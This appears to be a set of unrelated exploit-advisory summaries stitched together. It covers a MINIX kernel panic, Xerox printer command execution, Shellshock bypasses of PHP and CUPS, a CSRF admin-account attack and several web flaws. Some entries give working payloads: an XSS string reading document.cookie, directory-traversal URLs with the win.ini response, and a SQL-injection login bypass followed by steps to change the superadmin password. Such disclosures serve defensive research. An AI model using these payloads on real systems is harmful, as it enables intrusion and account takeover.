MINIX 3.3.0 is prone to a local kernel panic due to malformed program headers in an ELF executable. Attached are three PoCs that panicked the OS, along with their modified fields.
Log in to the system and upload any image. When uploading the image, the attacker needs to enter the XSS payload in the 'Title' or 'Description' inputs. All visitors and logged-in users will be affected by this vulnerability.
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary commands under root privileges.
This exploit allows an attacker to bypass the disable_functions directive in PHP 5.x and execute arbitrary commands on the vulnerable system. The exploit works by exploiting the CVE-2014-6271 vulnerability in Bash, which allows an attacker to set environment variables with specially crafted values before calling the PHP mail() function. The exploit then reads the output of the command from a temporary file and returns it to the attacker.
The worst is at the topic page, Submit Comment: Payload: [url=[img]onmouseover=alert(document.cookie);//://hackersoul.com/image.jpg#"aaaaaa[/img]]evi1m0#knownsec[/url] You see an alert.
This exploit allows an attacker to add an admin account to the Who's Who Script by exploiting the CSRF vulnerability present in the ayarsave.php, uyesave.php, slaytadd.php, and slaytsave.php files. The attacker can craft a malicious HTML page that contains a form with the username and password fields and submit it to the vulnerable file. The form will be automatically submitted without the user's knowledge, and the attacker will be able to add an admin account to the Who's Who Script.
A stored XSS vulnerability exists in ZTE Modem, where the variable aerviceName can be set to a malicious payload <script>alert(0)</script> which can be used to execute arbitrary JavaScript code in the context of the user's browser.
The malicious user sends a malformed request that traverses up the directory tree to access a file, as follows: http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini or else http://target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../../../windows/win.ini The application answers: ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1
This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default.
Maarch GEC <= 1.4 and Maarch Letterbox <= suffer from multiple SQL injection vulnerabilities. The worst is at the login page, index.php : login : superadmin' OR user_id='easy pass : whatyouwant You see an SQL error, but reload the web page and you are logged in. To change the superadmin password: go to Menu -> Mon Profile, type your new password twice, an email, etc., and click on save. A new SQL error appears (history table, so we don't care), but the password is changed. Clear your cookies, return to the application URL, enter your fresh new password, and it's done.